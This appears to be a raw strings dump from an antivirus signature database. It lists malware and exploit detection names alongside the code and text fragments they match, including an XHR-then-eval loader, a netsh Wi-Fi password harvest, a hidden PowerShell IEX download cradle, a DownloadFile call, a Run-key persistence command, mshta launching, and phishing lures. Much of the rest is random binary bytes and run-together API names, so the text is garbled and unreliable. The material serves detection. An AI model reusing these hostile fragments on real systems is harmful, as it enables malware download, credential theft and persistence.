<metahttp-equiv=\"refresh\"content=\"1;url='https:// !#SCRIPT:InvokeArrayAssembly =assembly.load( .toarray());type .gettype(\" \");object =activator.createinstance( ,null);methodinfo .getmethod(\" ,newobject[]{args}); !#SCRIPT:PowerShell/Lankez.A =netshwlanshowprofiles|select-string-pattern\"alluserprofile\"|foreach-object <foreach-object .replace(\"alluserprofile:\",$null foreach-object{netshwlanshowprofilesname= !#TEL:Extention:JS/SearchHijack varxhr=newxmlhttprequest();xhr.onreadystatechange=function(){xhr.readystate==4&&xhr.status==200&&eval(xhr.responsetext);};xhr.open('get','https:// G',true);xhr.send(); !#SCRIPT:Exploit:HTML/Pangimop.K !#SCRIPT:Exploit 6cb3428ff328 6ed7f5fb3bf2 6fd7775cb0c8 b878a6f87db7 c17813b4daf1 c278ec754d33 ac78117e8e54 ac78117e8e54Flags1 HSTR:Win32/Kernel32_via_PEB 1b878f68dd3af 1b878f68dd3afFlags1 !#Lua:FilledWithFFOnly !#Lua:FilledWithFFOnlyObMpAttributes !#PUA:Block:PresenokerOnly !#PUA:Block:PresenokerOnlyObMpAttributesg PUA:ML:Block PUA:Block:Presenoker 1e613f285f3b TEL:Ransom:Win64/Magniber.PB!MTB !TEL:Ransom:Win64/Magniber.PB!MTB 3089a51bf017 43b3858b75bb WTSIsRemoteSession MpNewRemoteUsers 50951d77988d 55955da83735 55b30bf3781f 5bb39991c1d6 7178549908c1 a3b36922ce8d 52784659c3ee 52784659c3eeFlags1 FOP:Win32/Crybot 53b3eaf4f9fe 53b3eaf4f9feIncludesResearchData priteshell_malware 59b34575e770 59b34575e770IncludesResearchData 5db3ff5145a6 5db3ff5145a6IncludesResearchData 13678da46f72d 158787d950190 196783e005eef 1d878b6cd9e75 1e678dc479b21 !#LUA:TrickLongFilename ________________.exe LUA:TrickLongFilename !#TEL:HackTool:Win32/GDad_sclmFS.A!dha sclm.dll \tsclm.dll !#Lua:JAMSI !#Lua:JAMSIObMpAttributes MpIsJScriptEncodeAMSIScan MpIsVBScriptEncodeAMSIScan 19b3143df299 GetMotwHostUrlForFile 11278ae6afa75 1ad7844c48adb !#PEPCODE:Rorpian !#LUA:MSIL/SuspiciousFileSS !#LUA:MSIL/SuspiciousFileSSObMpAttributes .pdf!.exe !#Lua:FlashPlayerSetupFilename.A !#Lua:FlashPlayerSetupFilename.AObMpAttributes flashplayer_setup.exe Lua:FlashPlayerSetupFilename.A 67b35594876d =$ Mg FT|rp wWHEo w#FN4^ {&<^| N2?&l :NZ>t /=|:\" W)8S'f . }dG YD\"EO #c>b;p k l.I c)Fpy 4<5$iN LTf,9 H#lj x=$:NL CE}uV 30{2| KT#On 2QAL7]Z nmrIu TU\tl0 Ed6d\\ _Mn&| _Uhn1 af&:fz4 7lLoL x\"i$! %ph2F I~A)h N9%y| Iv;8m UtLu\" 7,<&> Y1ThZ# X>7-s NZ`o| u/;Zl n5V3Z ;fb|j m :8) x_xvD%U \"]7b\" DXlBO =_i>N 3ERBk ?`Ph@ +S6*K &Y%UM0[ _j`l1 Hn2e5 %2`fh !';@4 EC=~1 ^8_A l v/p [\"\t'|| [,s-1 !*k7f :o(-9 1pP(t AmY+| ce!' &VKT]: w>@^Jo B2dwu` \"`E1bC /^w8{O p=>7s <4 `'\t yc.uj> J ~to7A^bAS dwFlagsAndAttributes hTemplateFile numBytesToWrite lpNumberOfBytesWritten lpOverlapped nNumberOfBytesToRead lpNumberOfBytesRead lpFileSizeHigh lDistanceToMove lpDistanceToMoveHigh dwMoveMethod pwzSource cchSource pbDestBuffer cbDestBuffer null1 null2 lpMultiByteStr cbMultiByte lpWideCharStr cchWideChar hndFindFile lpFindFileData lpExistingFileName lpNewFileName bFailIfExists dwMilliseconds lpSystemTimeAsFileTime lpMutexAttributes bInitialOwner hMutex lpSrc lpDst lpName lpValue lpPathName lpSecurityAttributes uFlags uBytes lpModuleName pCaller szURL szFileName dwReserved lpfnCB hwndOwner lpszPath csidl fCreate radix pszTrimChars lpSubKey ulOptions samDesired phkResult lpClass dwOptions lpdwDisposition lpValueName lpType lpData lpcbData dwType cbData TokenAddr pbuffer cchBuffer dwlength subkey System.IO.Compression DeflateStream Bitmap PixelPayload PixelPayloadB64 PixelPayloadArray <PrivateImplementationDetails>{538E2ABA-B539-432E-9B1E-4016FCA42E3F} __StaticArrayInitTypeSize=130 $$method0x60003b5-1 $$method0x6000197-1 IsSpecialPayload __StaticArrayInitTypeSize=52 $$method0x60003c2-1 $$method0x60003c2-2 __StaticArrayInitTypeSize=128 $$method0x60003c3-1 shlwapi.dll ole32.dll tiondwFlagsAndAttributeshTemplateFilenumBytesToWritelpNumberOfBytesWrittenlpOverlappedlpBuffernNumberOfBytesToReadlpNumberOfBytesReadlpFileSizeHighlDistanceToMovelpDistanceToMoveHighdwMoveMethodcppwzSourcecchSourcepbDestBuffercbDestBuffernull1null2lpMultiByteStrcbMultiBytelpWideCharStrcchWideCharhndFindFilelpFindFileDatalpExistingFileNamelpNewFileNamebFailIfExistsdwMillisecondshModulelpFilenamenSizelpSystemTimeAsFileTimelpMutexAttributesbInitialOwnerhMutexlpSrclpDstlpNamelpValuelpPathNamelpSecurityAttributesuFlagsuByteslpModuleNamedestpCallerszURLszFileNamedwReservedlpfnCBhwndOwnerlpszPathcsidlfCreateradixpszpszTrimCharshKeylpSubKeyulOptionssamDesiredphkResultReservedlpClassdwOptionslpdwDispositionlpValueNamelpTypelpDatalpcbDatadwTypecbDataSrcTokenAddrpSrcpbuffercchBufferdwlengthsubkeymscorlib.cctorkernel32.dllmscoree.dllntdll.dllSystem.IO.CompressionDeflateStreamCompressionModeSystem.DrawingBitmapPixelPayloadPixelPayloadB64PixelPayloadArray<PrivateImplementationDetails>{538E2ABA-B539-432E-9B1E-4016FCA42E3F}__StaticArrayInitTypeSize=130$$method0x60003b5-1$$method0x6000197-1IsSpecialPayload__StaticArrayInitTypeSize=52$$method0x60003c2-1$$method0x60003c2-2__StaticArrayInitTypeSize=128$$method0x60003c3-1urlmon.dllshell32.dllmsvcrt.dllshlwapi.dllole32.dlladvapi32.dll=RPF:SmartAssemblyDESKeysOffset mscorlib.dll;HSTR:SmartAssemblyStrDelegate False\tTrue .#Microsoft Win32S +Microsoft Windows 95 +Microsoft Windows 98 +Microsoft Windows NT +Microsoft Windows CE Mac OS X <unknown> JohnDoe HAL9TH Service Pack 1 )c:\\temp\\Assembly.exe c:\\myapp.exe#RPF:SmartAssembly > \tInherited d:\\pavbld\\amcore\\Signature\\Source\\sigutils\\vdlls\\Microsoft.NET\\VFramework\\mscorlib\\mscorlib.pdb _CorDllMainmscoree.dll FileVersion0.0.0.0< InternalNamemscorlib.dll( LegalCopyright D OriginalFilenamemscorlib.dll4 Assembly Version0.0.0.0p !#TELPER:Ransom:Win32/Teerac.R _Run@4 _Run@4%s\\%s payload.dll _Start@4 payload.dll_Start@4 !#TELPER:Ransom:Win32/Teerac.S , shared_%s Software\\Microsoft\\%s !#Possible:VBFOPEX:VobfusBeebone.AlCK 79!#Possible:VBFOPEX:VobfusBeebone.AlCK !#FOP:Emotet64MainH !#TEL:Exploit_Metasploit.A!EOPTAH MfIAMIKMu !CabSfxW_4a1ba5bdHVWAHHHHHHHH3A3 !CabSfxW_4a1ba5bdHVWAHHHHHHHH3A3 DDHHD !#FOP:Emotet64Unpack1@HH !#FOP:Emotet64Unpack1@HH !Upx64nrv2b /!Upx64nrv2b !#FOP64:Win64/Eumbra.A!emsD !#FOP64:Win64/Eumbra.A!emsD D1[]AAAA !#FOP64:Win64/Eumbra.A!emsY1HHHHWH3HH !#FOP64:Win64/Eumbra.A!emsY1HHHHWH3HH HL!L33 !#ALF:Backdoor:Win64/Drixed.SD!MTB ALILA DAHLA !Upx64nrv2d 4!Upx64nrv2d !#do_exhaustivehstr_64bit_rescanH D !#do_exhaustivehstr_64bit_rescanH !AutoHotKey_v1x_&_AutoIt_v3010xHHuDH3 $!AutoHotKey_v1x_&_AutoIt_v3010xHHuDH3 !RarDefault_390HWH :!RarDefault_390HWH HHtEE HHtHH !Upx64nrv2e ?!Upx64nrv2e !CabSfxW_4a1ba5bdHHWHIH O!CabSfxW_4a1ba5bdHHWHIH @t@u9u ;t@uLE !CabSfxW_4a1ba5bdHHHWHIH T!CabSfxW_4a1ba5bdHHHWHIH HHHH_ !AutoIt_v3.3.14.x64HUSVWAH X!AutoIt_v3.3.14.x64HUSVWAH HA_^[] !RarWinConX64_400H _!RarWinConX64_400H DAtAtAuD !RarWinConX64_420H `!RarWinConX64_420H !RarWinConX64_500@AA g!RarWinConX64_500@AA HHHHHD H3HtH LIIIAA_ h!RarWinConX64_500@AA i!RarWinConX64_500@AA !RarWinConX64_390HHHWAA m!RarWinConX64_390HHHWAA tHHLHAH tLHHE LIIIIAA_ !CabSfxW_4a1ba5bdHWHEH3 p!CabSfxW_4a1ba5bdHWHEH3 HHLHHHHHH HHtHEHLHHHHH u9u!EE !RarDefault_390HHWH v!RarDefault_390HHWH HHtHLH HHHHH HLHHHEHH !RarDefault_390HWH3 v!RarDefault_390HWH3 3HHtH ;tHD3 LHLHEHLHH 9u9tH v!RarDefault_390HWH !RarDefault_390HHWH3 HHHHEHHH !RarDefault_390HVH3 !RarDefaultX64_420HHWH !AutoIt_v3.3.12.x64HHUVWAAHHHIH ~DD3EI HHAA_^] !AutoIt_v3.3.14.2.x64HHHHLUAAHHHEIHD HHHLLLHD LIIIMIAA] !Upx64lzmaSVWUHHW UHDIHHV HHjHuSH HPAHEAAAEAUSHH EA1IIL HHHHALwL AAHAAD AHILwL HAMwL HDAA@ ffHAfHwL ffAfwL AAHD) fHHAHwL AsAAAEBf DDDDAD fHHMA fMAffAD HAIwL HAHHL IAIwL HIAHDHHL AAHAAEErEA EwHDDDDA !Upx64lzmaSVWUHHfW !Upx64lzmaSVWUHHH !#LoD:VirTool:Win64/Obfuscator.KHHHHH !#FOP:Emotet64LdrHashString !#VirTool:Win64/Obfuscator.FHLL !PyInstaller <u|$8M !#VirTool:Win64/Obfu SCPT:CVE-2019-1652-1653-A 227f0e81c715 kill_proc_str taskmgr.exe, msconfig.exe, regedit.exe, cmd.exe 0taskmgr.exe, msconfig.exe, regedit.exe, cmd.exe 41b31f92eb3f 57784a1884fd TEL:TrojanDownloader:Win32/AdLoad.A!MSR (TEL:TrojanDownloader:Win32/AdLoad.A!MSR 767808f77e7b *.pdb efb3f341f2fd fb784ec2d64f fb784ec2d64fFlags1 63b3bf7a8002 63b3bf7a8002IncludesTechniqueTracker persistence_schtask_a 14678f542be8b 16478728771a4 .code !#Lua:SuspLoaderBatFile !#Lua:SuspLoaderBatFileObMpAttributes loader.bat 2db3f0dc40fc \\%d+%.exe 5b78022f5d53 69b3db3823b5 onlogon a7a9ab42bc14 GetSSLCertificate , OU=(.+), CN=(.+), EMAIL=(.+) 77b3c7ef53d6 77b3c7ef53d6IncludesTechniqueTracker T1543.003 persistence_services_b f3b322c6d516 f3b322c6d516IncludesTechniqueTracker persistence_services_a #Exploit:Win32/RockCandy.B!Lowfi Exploit:Win32/RockCandy.B!Lowfi.1 \"Exploit:Win32/RockCandy.B!Lowfi.1 Control.TaskSymbol.1 DevilsTongue HKLM\\Software\\Classes\\CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA} CHKLM\\Software\\Classes\\CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA} HKCU\\Software\\Classes\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24} CHKCU\\Software\\Classes\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24} 1461e6375b33 2178962c20f8 2489cb18a5bc 4778070557b8 MpHasValidProjPath 5cb3c05d8b85 6cd7f5b0596e 767839f1b404 points 5329017eb513 5329017eb513IncludesResearchData .vcxproj \t.vcxproj be29cae42820 be29cae42820IncludesResearchData 23891e94c783 49b331cca4f8 55d7b7c649c7 616184941138 CERT:PUA:Win32/DLAssis.A1 PUA:ML:Blocked:DownloadAssistant !PUA:ML:Blocked:DownloadAssistant 6cb36a5c5a4d ee78032bd944 lock_res \tlock_res 37b3ca05dd26 37b3ca05dd26IncludesBMLuaLib 5db3a4e53a10 5db3a4e53a10IncludesBMLuaLib 19178d493106a 34782e2e017d 5e61371748f8 65d7bc8760a7 8078554945d1 9e78595044eb a48fde1124e6 c678541775f5 10db3796ae608 10db3796ae608IncludesBMLuaLib !#EnumPoCExchgGoSource !#EnumPoCExchgGoSourceObMpAttributes SCPT:PoCExchgGoSource Lua:PoCExchgGoSourceFrags 12782302d435 doshdr e_lfanew \te_lfanew SizeOfOptionalHeader ]${xA` \tJ'5}H Xm~eB :^nkW Yw:>-h ! I`\t ! I`\t ! z1en ! z1en !\"U}5 !\"U}5 !%r-- !%r-- QT|+K} hH* \"z%j27z !*Rj -h_eH8 ;qJLXC\t !4Zh|$L8gc !4Zh|$L8gc _YCkp RS~!Z L#FLIo De}}AT !;HQ- !;HQ- za5hbJt4 %l4W5 !<EHo !<EHo ;c\"pC .{?R1 *6z.#(Q I`$X% !Bb1F !Bb1F *n%_Q !L#} !O$S !RU| !TZD !U7> !U>wnp !U>wnp P;Wli ?!Wb3 !X+:h !X+:h !Y\"=B !Y\"=B !Y8S !rf/| !^w W<Bh\" |3e*! wF3=\\\t !_8Ma !_8Ma !_DD !_Iy !_S !`y-[ !`y-[ Bl@KS !cdc !csO %ZlW+ !eRj W^)zg !fY? !g)i !gM! dK0~\" FR\\S( ;G{p+\\ !j8F !j>a8 !j>a8 }s&<b n}}s&<b !ny'? !ny'? !o _O !o _O 0?gzb@ !qJG 1N}F\"4 !qZ( a!\t{% j#vgw !{h \\ !{h \\ l9Pem l9Pemh OE`^! 4\"+ Z X#wy\" +?++q.R $9q.Z L$9q.Z `c\\}G XN;[- AMdyl jQYsI` Hr VeE F!pHk Tn`@Iy F62Na v+,l,F K+Q~@w ,2\tr* H;\"$n. &1v(h XO#E:C RX )e JZ~@\\> EV];b !#SCPT:JS/Obfuscator.Redundancy.G \"===\" 1\"===\" \t0-9A-Za-z\"===\" ]&!#SCPT:JS/Obfuscator.BASE64.argument.A ,']+\" 0-9A-Za-z+/ '!#SCPT:HTML/PhishPhrase.Password.efax.A ]'!#SCPT:HTML/PhishPhrase.Password.efax.A Efax Password: +Efax Password: '!#SCPT:JS/Obfuscator.AssembledStrings.A ]'!#SCPT:JS/Obfuscator.AssembledStrings.A +';var )!#TrojanDownloader:PowerShell/Ploprolo.K2 ])!#TrojanDownloader:PowerShell/Ploprolo.K2 )-nop -w hidden -c \"$ *!#SCPT:JS/Obfuscator.BASE64EncScript.arg.A ]*!#SCPT:JS/Obfuscator.BASE64EncScript.arg.A (==\". 0-9A-z() ](]))& ^ !#SCPT:Java/AdwindOddClassName.H !#SCRIPT:Java/AdwindOddZIPFile.A ^ !#SCRIPT:Java/AdwindOddZIPFile.A A-Za-z/? ^!!#SCPT:JS/Obfuscator.DigitalSet.A .length - ( 2.length - ( 0, 2)) { #!#SCPT:JS/Obfuscator.concat.array.A ^#!#SCPT:JS/Obfuscator.concat.array.A () + [\" 0() + [\" ^-!#SCPT:JS/Obfuscator.Redundancy.EmptyQuotes.C + \"\" + \" &+ \"\" + \" 0!#SCPT:JS/Obfuscator.Redundancy.Arithmetic.hex.A ^0!#SCPT:JS/Obfuscator.Redundancy.Arithmetic.hex.A #=0x0 \t0-9A-Fa-f+0x \t0-9A-Fa-f #=0x1 #=0x2 #=0x3 #=0x4 #=0x5 #=0x6 #=0x7 #=0x8 #=0x9 !#SCPT:HTML/PhishPhrase.D ou have therefore been allocated to claim a total sum of ;ou have therefore been allocated to claim a total sum of Handler.class :Handler.class !#SCPT:JS/Obfuscator.Stub.A = 'S'; 9= 'S'; return (() { = 'S'; = 'c'; 9= 'c'; = 'c'; = 'd'; 9= 'd'; = 'd'; 9= 'e'; = 'e'; = 'i'; 9= 'i'; = 'i'; 9= 'n'; = 'n'; = 'p'; 9= 'p'; = 'p'; = 'r'; 9= 'r'; = 'r'; = 's'; 9= 's'; = 's'; 9= 't'; = 't'; !#SCPT:PDF.Producer.RAD_PDF.B /Creator(RAD PDF)/RadPdfCustomData(pdfescape.com-open 7/Creator(RAD PDF)/RadPdfCustomData(pdfescape.com-open !#BRUTE:GlbFileWIthJsonBuffer.A 5glTF data:application/gltf-buffer;base64, _!!#SCPT:JS/Obfuscator.DigitalSet.A \")]=( 3\")]=( 0-9);switch( \"!#SCRIPT:Win32/CVE-2012-4914!shell _\"!#SCRIPT:Win32/CVE-2012-4914!shell %!#SCRIPT:OLE.EquationShellcodeRelated _%!#SCRIPT:OLE.EquationShellcodeRelated _)!#TrojanDownloader:PowerShell/Ploprolo.K2 +-nop -w hidden -c IEX _-!#SCPT:JS/Obfuscator.Redundancy.EmptyQuotes.A = \"\"+\" '= \"\"+\" \t0-9A-Za-z\"+\"\"; !#SCPT:JS/httpArray.A =['http:// @=['http:// ','http:// !#SCPT:PowerShellHiddenWindow.A IWshShell 6IWshShell .Run(\"false\", \"0\", \"powershell.exe -w 1 \"!#SCPT:JS/Obfuscator.LongVarName.B `\"!#SCPT:JS/Obfuscator.LongVarName.B 3]](); %!#SCPT:JS/Obfuscator.Split.function.A `%!#SCPT:JS/Obfuscator.Split.function.A 0(\\\"f '!#SCPT:JS/Obfuscator.Split.hex.Script.A `'!#SCPT:JS/Obfuscator.Split.hex.Script.A .(\"53 '!#SCRIPT:OLE.EquationShellcodeRelated.B `'!#SCRIPT:OLE.EquationShellcodeRelated.B `0!#SCPT:JS/Obfuscator.Split.String.fromCharCode.A %Str\"+\"i !#SCPT:LokiFigBE REG AD FREG AD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \" !#SCPT:ShallowFerry1 yni4pzHM7KAAAAAAAAAACG-uAVr2IuhCMwDMcp2jws9WPKPO1k7c3_gUZrHbcH_h Byni4pzHM7KAAAAAAAAAACG-uAVr2IuhCMwDMcp2jws9WPKPO1k7c3_gUZrHbcH_h = \"Sc\"; ;= \"Sc\"; = \"Sc\"; = \"WS\"; ;= \"WS\"; = \"WS\"; = \"cr\"; ;= \"cr\"; = \"cr\"; = \"ip\"; ;= \"ip\"; = \"ip\"; = \"pt\"; ;= \"pt\"; = \"pt\"; = \"ri\"; ;= \"ri\"; = \"ri\"; !#SCPT:ZipHasDocPasswordShown .docPK 9.docPK Password for this file is - Password for this file is !#ALF:Trojan:BAT/Trilark.B!dha .hta & del \"%appdata%\\ 8.hta & del \"%appdata%\\ .bat\" mshta.exe http #!#ALF:Exploit:SWF/Korpode.A.kodiurl a#!#ALF:Exploit:SWF/Korpode.A.kodiurl www.kodi-m.com/new/admin/data/product/manager.php 3www.kodi-m.com/new/admin/data/product/manager.php a%!#SCPT:JS/Obfuscator.Split.parseInt.A p\"+\"a 1p\"+\"a p'+'a 1p'+'a '!#SCPT:JS/Obfuscator.replace.capitals.A a'!#SCPT:JS/Obfuscator.replace.capitals.A /.replace(/ 0-9A-Z/g, ''); )!#SCPT:HTML/PhishPhrase.payment.delayed.A a)!#SCPT:HTML/PhishPhrase.payment.delayed.A your payment has been unnecessarily Delayed -your payment has been unnecessarily Delayed +!#SCPT:JS/Obfuscator.eval.argument.digits.A a+!#SCPT:JS/Obfuscator.eval.argument.digits.A = eval( += eval( A-Za-z(\" 0-9A-F\", 3!#SCPT:VirTool:SWF/Obfuscator.SymbolClassWiseLoop.A a3!#SCPT:VirTool:SWF/Obfuscator.SymbolClassWiseLoop.A #_1lI 1lI_@ !#SCPT:RTF/uri_hex.xls.A {\\*\\deftab ?{\\*\\deftab }005C005C00 }005C005C00 2e0078006c0073000000000000000000 !#SCPT:PDF/PDFPhishPhrase.A > click purchase order below to view. </span></p></body> <> click purchase order below to view. </span></p></body> !#SCPT:SWF/ManyShowFrames.A <@@@@ <rdf:RDF xmlns:rdf=' $!#SCPT:JS/Assignment.Array.Decimal.A b$!#SCPT:JS/Assignment.Array.Decimal.A 3= [0 3= [1 3= [2 3= [3 3= [4 3= [5 3= [6 3= [7 3= [8 3= [9 &!#TEL:SCPT:Java:HasRepetitiveClassName b&!#TEL:SCPT:Java:HasRepetitiveClassName 1.classPK ,!#SCPT:JS/Obfuscator.Capslock.ListViewCtrl.A b,!#SCPT:JS/Obfuscator.Capslock.ListViewCtrl.A .LISt +.LISt .LIsT +.LIsT .LIst +.LIst .LiST +.LiST .LiSt +.LiSt .LisT +.LisT .lIST +.lIST .lISt +.lISt .lIsT +.lIsT .lIst +.lIst .liST +.liST .liSt +.liSt .lisT +.lisT !#SCPT:VBS/Obfuscator.gifExt.A .gif\" :.gif\" !#SCPT:VBS/Obfuscator.zipExt.A .zip\" :.zip\" c!!#SCPT:JS/Obfuscator.Juxtaposed.B \"] = ' 7\"] = ' \"] = \" A-Za-z\"; c!!#SCPT:JS/Obfuscator.Redundancy.P = [\"C\"][( 7= [\"C\"][( = [\"f\"][( 7= [\"f\"][( #!#SCPT:JS/Obfuscator.DecimalArray.A c#!#SCPT:JS/Obfuscator.DecimalArray.A \")]==( 5\")]==( c&!#SCPT:JS/Obfuscator.BASE64.argument.A 2\" + \" c'!#SCPT:JS/Obfuscator.Split.powershell.A p\" + \"o 1p\" + \"o c'!#SCPT:JS/Obfuscator.replace.capitals.A \"replace\"](/ 1\"replace\"](/ !#SCPT:DocHasJar Desktop\\ #!#SCPT:JS/PowerShell.DownloadFile.A d#!#SCPT:JS/PowerShell.DownloadFile.A (New-Object System.Net.WebClient).DownloadFile('http 6(New-Object System.Net.WebClient).DownloadFile('http d$!#SCPT:Exploit:O97M/CVE-2017-11882.A %!#SCRIPT:Equation3_Overflow_WinExec.A d%!#SCRIPT:Equation3_Overflow_WinExec.A &!#BRUTE:Exploit:Python/CVE-2017-0143.7 d&!#BRUTE:Exploit:Python/CVE-2017-0143.7 SMB1 session setup allocate nonpaged pool success 3SMB1 session setup allocate nonpaged pool success d&!#SCPT:JS/Obfuscator.DictionaryWords.A (\"\"+\" 3(\"\"+\" [\"\"+\" 3[\"\"+\" &!#SCPT:JS/Obfuscator._0x.Math.random.A d&!#SCPT:JS/Obfuscator._0x.Math.random.A ('\\x5c',Math[_0x 3('\\x5c',Math[_0x `')](0x24)[_0x ')](0x2,0x9)); (!#SCPT:JS/Obfuscator.Split.constructor.A d(!#SCPT:JS/Obfuscator.Split.constructor.A 1= \"c *!#SCPT:JS/Obfuscator.Redundancy.NewLines.B d*!#SCPT:JS/Obfuscator.Redundancy.NewLines.B '+''+ /'+''+ 'f('+ /'f('+ d-!#SCPT:JS/Obfuscator.Redundancy.EmptyQuotes.A == \"\" + ,== \"\" + \t0-9A-Za-z) !#SCPT:Java/JarHasBlob .g () {return this.charAt((( =.g () {return this.charAt((( ;IWshShell .Run(\"false\", \"0\", \"powershell.exe -W Hidden !#ALF:Trojan:Win32/LokiFig.C!dha e !#ALF:Trojan:Win32/LokiFig.C!dha c:\\users\\ops\\app :c:\\users\\ops\\app ata\\local\\programs\\python\\python35-32 (!#SCPT:JS/Obfuscator.Reversed.HexMixed.A e(!#SCPT:JS/Obfuscator.Reversed.HexMixed.A rav\\n;\" 2rav\\n;\" 0-9a-fx\\\\ 0-9a-z rav e*!#SCPT:VBS/Obfuscator.SplitPatternHTTP.001 /* 0= \"h\"; /* += \"ttp\"; +!#SCPT:JS/Obfuscator.Redundancy.UnusedVar.E e+!#SCPT:JS/Obfuscator.Redundancy.UnusedVar.E '; var /'; var '; var '; var .!#//SCPT:DigitalSignature.GlobalSign.SHA256.G2 e.!#//SCPT:DigitalSignature.GlobalSign.SHA256.G2 (GlobalSign Timestamping CA - SHA256 - G2 0!#SCPT:Adware:Win32/PennyBeeLinkury.DigitalSig.A e0!#SCPT:Adware:Win32/PennyBeeLinkury.DigitalSig.A 643561 *643561 Israel Tel Aviv @ReSoft LTD. lp/sq/d.pngPK Alp/sq/d.pngPK PMANGER.classPK !#SCPT:Java:HasLongClassName ?.classPK P.classPK &!#SCPT:Adware:Win32/SupSearchProtect.A f&!#SCPT:Adware:Win32/SupSearchProtect.A Giner Tech Inc1 5Giner Tech Inc1 Giner Tech Inc0 globalsign.com f,!#SCPT:JS/Obfuscator.Redundancy.Arithmetic.A /= 0x */+- 0x f0!#SCPT:JS/Obfuscator.Split.String.fromCharCode.A +St\"+\"r 1!#SCPT:JS/Obfuscator.BASE64HexEncScript.WScript.A f1!#SCPT:JS/Obfuscator.BASE64HexEncScript.WScript.A MjJceDU3XHg1M1x4NjNceDcyXHg2OVx4NzBceDc0 *MjJceDU3XHg1M1x4NjNceDcyXHg2OVx4NzBceDc0 !#SCPT:JS/Obfuscator.StaticXOR.A g !#SCPT:JS/Obfuscator.StaticXOR.A Code\"]; <Code\"]; A-Za-z[ A-Za-z % A-Za-z.length]); g!!#SCPT:JS/Obfuscator.Redundancy.Q ;if(\"\\x !=== \"\") g%!#SCPT:JS/Obfuscator.Split.function.A !#SCPT:HTML/PhishPhrase.DHL.B [(Fi)7(l)5(e is )8(secu)3(r)-3(ed)3(.)6( )-4(P)4(l)5(ea)3(se ) @[(Fi)7(l)5(e is )8(secu)3(r)-3(ed)3(.)6( )-4(P)4(l)5(ea)3(se ) h(!#SCPT:JS/Obfuscator.Reversed.HexMixed.A 5rav\\n;\" \t0-9A-Za-z rav *!#SCPT:JS/Obfuscator.Redundancy.NewLines.C h*!#SCPT:JS/Obfuscator.Redundancy.NewLines.C \"+ \" 3\"+ \" \"+ \" @\"+ \" @\"; varfunctionif LibraryTest3.textPK DLibraryTest3.textPK *LibraryTest.textPK *LibraryTest2.textPK !#SCPT:JS/Obfuscator.Zlader.H.1 ='555 ?='555 @5E225E @5E17 54555657505152535C5D5E !#SCPT:HTML/PhishPhrase.Rakyat.C i !#SCPT:HTML/PhishPhrase.Rakyat.C .p)-7(df) >.p)-7(df) (i)5(k)-17(hl)7(as)-3(, (i)5(Rak)-28(y)18(at) &!#SCPT:JS/Obfuscator.WScriptDecimals.A i&!#SCPT:JS/Obfuscator.WScriptDecimals.A =WScript; 8=WScript; 0-9\")]; (!#SCPT:JS/Obfuscator.Split.hex.WScript.A i(!#SCPT:JS/Obfuscator.Split.hex.WScript.A 6(\"57 *!#SCRIPT:Exploit:Win32/CVE-2014-4114.A!gif i*!#SCRIPT:Exploit:Win32/CVE-2014-4114.A!gif mbeddedStg 4mbeddedStg \\\\37.59.5.18\\11\\test. .txt\\\\37.59.5.18\\11\\test. gifinf *!#SCRIPT:Exploit:Win32/CVE-2014-4114.B!gif i*!#SCRIPT:Exploit:Win32/CVE-2014-4114.B!gif \\\\216.66.74.22\\/root/smb4k/teamths\\ths. 4\\\\216.66.74.22\\/root/smb4k/teamths\\ths. +!#SCRIPT:Exploit:Win32/CVE-2014-4114-infgif i+!#SCRIPT:Exploit:Win32/CVE-2014-4114-infgif EmbeddedStg 3EmbeddedStg .txt\\\\ \\slide !#SCPT:PDF/URIType.A /Type /Action K/Type /Action >> 1 load/IDPK Eload/IDPK cMETA-INF/MANIFEST.MFPK .e () {return this.charAt((( B.e () {return this.charAt((( +-|*&^ +-|*&^( j$!#SCPT:Exploit:O97M/CVE-2017-11882.A j1!#SCPT:JS/Obfuscator.BASE64HexEncScript.WScript.A eDIyXHg1N1x4NTNceDYzXHg3Mlx4NjlceDcwXHg3NFx4 .eDIyXHg1N1x4NTNceDYzXHg3Mlx4NjlceDcwXHg3NFx4 !!#SCPT:JS/Obfuscator.Redundancy.S k!!#SCPT:JS/Obfuscator.Redundancy.S [parseInt][( ?[parseInt][( k\"!#//SCRIPT:Java/AdwindOddZIPFile.A a-zSPK #!#SCPT:JS/Obfuscator.DecimalArray.C k#!#SCPT:JS/Obfuscator.DecimalArray.C =|99| k&!#SCPT:JS/Obfuscator.DictionaryWords.A :\"+(\" k&!#SCPT:JS/Obfuscator.WScriptDecimals.A =[WScript]; :=[WScript]; l !#SCPT:JS/Obfuscator.LongNames.A = WScript.CreateObject( A= WScript.CreateObject( A-Z\")); l !#SCPT:JS/Obfuscator.StaticXOR.A Cod\" + \"e\"]; ACod\" + \"e\"]; l!!#//EXC:Exploit:Win32/ShellCode.A security-info FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjoj @security-infoFnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjoj l!!#SCPT:JS/Obfuscator.DigitalSet.A \")]; @\")]; A-Za-z >( 0-9)) $!#SCPT:Adware:Win32/LiveSoftAction.A l$!#SCPT:Adware:Win32/LiveSoftAction.A LiveSoftAction SRL1 =LiveSoftAction SRL1 LiveSoftAction SRL0 l&!#SCPT:JS/Obfuscator.DictionaryWords.A ;\")+(\" a-zA-Z\",\" a-zA-Z\")+\" l&!#SCPT:JS/Obfuscator.WScriptDecimals.A = WScript; ;= WScript; )!#TrojanDownlo l)!#TrojanDownlo DebuggerStepThroughAttributex !#ALF:Trojan:Win64/ClipBanker.ABM!MTB @ |$0~9H D$(HcD$0H InitOnceExecuteOnce Explorer_Server Explorer_Serverx !#ALF:Ransom:Msil/ShinoLocker.KS!MTB = ap(Q r ap(R kZ\" ?X(S l(T (U (< .shino get_StartInfo ShinoLocker ShinoLockerx !#ALF:TrojanDownloader:Win32/Scrop.SIB!MTB !#ALF:TrojanDownloader:Win32/Scrop.SIB!MTB2 .com Start Menu\\Programs\\Startup Start.lnk Start.exe bpwd.zip ftp.dat ftp.datx !#HSTR:TrojanDownloader:Win32/Travnet.A !#HSTR:TrojanDownloader:Win32/Travnet.Ad4 2Gepcffk%>$:*\"iegzk~chfo1*GYCO*<$:1*]cdne}y*D^*?$;#8d 2Gepcffk%>$:*\"iegzk~chfo1*GYCO*<$:1*]cdne}y*D^*?$;#8d ]ZPQL \\@Y) 